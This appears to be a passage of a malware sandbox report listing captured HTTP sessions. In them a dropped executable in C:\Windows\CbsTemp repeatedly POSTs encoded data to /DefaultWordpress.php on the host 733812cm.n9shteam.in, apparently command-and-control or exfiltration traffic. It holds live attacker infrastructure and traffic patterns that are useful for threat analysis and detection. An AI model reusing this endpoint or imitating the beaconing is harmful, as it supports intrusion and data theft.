                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.549903188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:24.454138041 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:24.807457924 CEST1948OUTData Raw: 5e 58 5c 53 5a 5d 54 50 54 5b 52 57 50 5c 57 5c 50 50 5d 5a 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\SZ]TPT[RWP\W\PP]ZPPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*U9%1> <3(&=> */#$>8%(0"Y')?#F $P.<
                                                          Oct 20, 2024 18:18:25.270581007 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:25.630959988 CEST944INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WbyOAaMdK%2F46lNvhmNlWbkHqI33ODpEXPYxlBGwQuJ%2BCcHt32YAIK563btYSLImaVNNf9B72yp9lFHA2AZwW1gp6Nxk6lb%2Fk%2Bc%2BGN66bZD3Bua%2FWka%2FpkeJwjvfLblEvSxAkldTKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52db6d58967c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13482&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=105179&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 12 27 2f 05 51 29 59 38 53 3a 07 29 1e 2e 3d 05 5b 2c 31 25 5e 27 20 22 1b 31 39 31 59 32 0d 24 07 23 3c 22 12 34 01 25 1d 2e 36 28 5e 07 12 26 5c 28 3c 37 05 29 2e 2b 00 28 06 20 15 36 09 30 1c 31 3d 33 54 24 03 31 5f 2a 0f 2a 04 29 13 2a 1f 39 1a 22 1a 3a 3b 3b 00 20 2a 22 53 03 13 26 00 3e 20 01 03 35 0b 2b 59 3f 13 02 00 3c 06 31 02 3e 20 2c 02 29 38 09 5f 2f 5b 3e 58 27 01 2f 02 32 59 24 5a 26 5c 27 54 24 2a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&'/Q)Y8S:).=[,1%^' "191Y2$#<"4%.6(^&\(<7).+( 601=3T$1_**)*9":;; *"S&> 5+Y?<1> ,)8_/[>X'/2Y$Z&\'T$*$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.549904188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:25.351983070 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:25.698152065 CEST2528OUTData Raw: 5b 5e 5c 53 5f 5d 54 50 54 5b 52 57 50 58 57 57 50 58 5d 5d 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^\S_]TPT[RWPXWWPX]]PPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ]) %_%;>(U+_$8)<[>?]3=_23:$="(*#F $P.,
                                                          Oct 20, 2024 18:18:26.162507057 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:26.544259071 CEST776INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XhikJuauFBaQ0Y6RzGNbynJtu58wiI84FZ21T7uw2KVyfjrAbq4B3pw7rjGxoFFC3r3is3a3DvNltQZHhBo5Y0BK8BOzaN4Hy8DwHnPP6gR635rGd2lpf0tJEzIEyUVDPqufq82gbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52e0fbca16a6-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11493&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=125302&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a
                                                          Data Ascii: 4?X_W
                                                          Oct 20, 2024 18:18:26.544451952 CEST5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.549913188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:26.738178968 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:27.088637114 CEST2528OUTData Raw: 5b 58 59 5c 5a 5f 51 57 54 5b 52 57 50 5f 57 51 50 5f 5d 5b 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [XY\Z_QWT[RWP_WQP_][PPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ (3%_2:?3<082=.=?<&> 11('(23=>?#F $P.0
                                                          Oct 20, 2024 18:18:27.789022923 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:27.795278072 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:28.304075956 CEST783INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sma8hdC5d5%2BhuLZ3YQX7krd86bDutkYjfEzCbmygkuBW1Hh5UpOF9VyDweu2q7tKNYeZDx8JVRqlQL3%2FgDHKQ9DSg9Etm3WMCrJ%2B7cu2ERRLIjkkDjxiTkyrcBBqwygNLFhDoBQo2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52e9ba7096b4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11154&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=130028&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a
                                                          Data Ascii: 4?X_W
                                                          Oct 20, 2024 18:18:28.304095984 CEST5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0
                                                          Oct 20, 2024 18:18:28.304125071 CEST5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.549914188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:26.945271015 CEST310OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:27.291822910 CEST540OUTData Raw: 5e 5a 5c 5a 5f 58 54 50 54 5b 52 57 50 5f 57 52 50 51 5d 5a 50 5c 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^Z\Z_XTPT[RWP_WRPQ]ZP\WT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y)&$;!?##]$+-V(/=,<Y$/[$!3)%=6)*#F $P.0
                                                          Oct 20, 2024 18:18:27.795231104 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:27.965095997 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:27.976411104 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZeTIWy7Ijjc%2BN6bEcdQR3qRyYBsUA0q996LrTOMUjZjf7LjFCajetBGXcpgD5kdsHk8pCTlPPbhqJKqnIZUeOv7EiwBY0R7KrL%2FBdCR%2ByaASEvZqKuV6D7H1gKiKpDw%2BYuohpTvpjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52eaec42fb30-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13081&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=111745&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:27.980592966 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----kb7tTFdb12NMuTS2CcOxlSJ9VLjfvA7Zu8
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3014
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:28.304153919 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:28.304368019 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 62 37 74 54 46 64 62 31 32 4e 4d 75 54 53 32 43 63 4f 78 6c 53 4a 39 56 4c 6a 66 76 41 37 5a 75 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------kb7tTFdb12NMuTS2CcOxlSJ9VLjfvA7Zu8Content-Disposition: form-data; name="0"Content-Type: text/plain[YYY__QVT[RWP\WTP^]^PPWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:28.696439028 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2zPWoN%2FXmsc8McDbPoZaYgdcFdfCntIAts0K6QYDJYdVt0tWkTNX3jgFdwOoYnRO21ZicHlylWMP3SRUglWjSMEzHWEqjjUDMkeybl764frb7jyNYeTwXkwfhc2tKqGJZy7Kedgdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52ed6e7cfb30-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13074&sent=7&recv=12&lost=0&retrans=0&sent_bytes=838&recv_bytes=4186&delivery_rate=222375&cwnd=61&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:30.636044025 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:30.810120106 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:30.810348034 CEST1948OUTData Raw: 5e 5d 5c 58 5f 5a 51 56 54 5b 52 57 50 5d 57 55 50 5a 5d 56 50 5c 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\X_ZQVT[RWP]WUPZ]VP\W]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _>=Y1!U(+[38=- Y=/4[3.$&7_0(*%.(#F $P.
                                                          Oct 20, 2024 18:18:31.204823017 CEST940INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Os1YSZvhYNt1%2Flb8AV99gELJWfOgibhjqxWLVJVQZUi9eaF0F9p9XwR2A3xDDsK%2FHgf4Jl5ClL68wx29uAHbDAmC9w2zIP8uWowMdAmGU3BZE9a2IelkPqgElFhkKD915xnRZx%2BChA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52fe0e4efb30-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13053&sent=11&recv=18&lost=0&retrans=0&sent_bytes=1648&recv_bytes=6421&delivery_rate=222375&cwnd=64&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 10 33 01 3b 1e 3d 2f 37 0d 3a 00 3d 51 3a 3e 34 07 2d 1f 2d 58 27 23 0f 01 26 04 25 13 26 0d 33 59 35 3c 32 5b 20 06 3d 1d 2e 26 28 5e 07 12 26 59 3f 2f 2c 5f 29 2e 28 59 2b 01 37 04 36 37 20 1c 27 3e 3b 1e 24 3d 3d 5d 3d 21 22 03 3d 04 22 55 2d 1d 2a 18 3a 06 20 11 22 3a 22 53 03 13 26 01 3d 56 37 02 21 21 23 13 28 04 24 03 2b 3b 32 5c 2a 0d 0a 04 2b 38 0e 02 2f 13 3e 10 27 3c 3b 00 26 2c 38 10 26 03 24 08 25 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&3;=/7:=Q:>4--X'#&%&3Y5<2[ =.&(^&Y?/,_).(Y+767 '>;$==]=!"="U-*: ":"S&=V7!!#($+;2\*+8/>'<;&,8&$%:$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.549920188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:28.489783049 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:28.838606119 CEST2520OUTData Raw: 5b 5a 59 5f 5f 59 51 52 54 5b 52 57 50 5a 57 5d 50 50 5d 58 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [ZY__YQRT[RWPZW]PP]XPVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#* "&;&(U'^$9(>*Y8'[213[$'==+:#F $P.
                                                          Oct 20, 2024 18:18:30.308402061 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:30.830126047 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfmlhUo5ZzGXbsaK6vDb8fieea%2BFFlfIY4u5xbktsmMadmgx2FfXBKUPCB9X6fA%2BDdjkmSidGpTlNbdiAgMUcynza%2BNMfTy%2Fwhx4Z6qbD3nHPQEmxwfjiY6KH5iO2cV3Vtu2OVd%2BWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52faeb6d9447-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11659&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2807&delivery_rate=126396&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.549928188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:30.953440905 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:31.307362080 CEST2528OUTData Raw: 5e 58 5c 5f 5a 5e 51 52 54 5b 52 57 50 5e 57 56 50 5f 5d 5f 50 57 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\_Z^QRT[RWP^WVP_]_PWWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _*%&U(#_3V?>4*4X$>?Z21_'+9'X:?#F $P.4
                                                          Oct 20, 2024 18:18:32.026254892 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:32.027343988 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:32.109965086 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kkjxE4iUIecP2Pq5F1%2Fmz9B0Qf03a%2BFVbnueYeS4DvaWRIWduclzVSfFpcB9qaqRBw9fmnaAeiwgz7CsUd5HiH6O96%2B1oZKMdRelh%2BNQUtSlvqZHdAvJDmeME89wAafGGGpuO4p3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5303da8c965b-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11162&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=130685&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.549933188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:32.380475998 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:32.729177952 CEST2528OUTData Raw: 5b 5a 5c 53 5a 5b 51 50 54 5b 52 57 50 5b 57 55 50 5a 5d 5e 50 50 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\SZ[QPT[RWP[WUPZ]^PPW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(3*%;&(3(5?=8X>Y7$[,2/%('%<:#F $P.
                                                          Oct 20, 2024 18:18:33.171194077 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:33.554187059 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKwK2N98DUtL9j5vzAYm7EWO5xkiqCsQuZJFgVIwT5kiQMOHAjQ9vgSVa9Y3X6BlZcP1sTXZ7kwMdbG%2BLezhcXdl6ZBM5kmcFg2SjedUN%2FJ2pT3gReTKSiC8BJDtctvHXwosRfQF%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a530cc88417ee-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12863&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112702&cwnd=68&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.549940188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:33.689393044 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
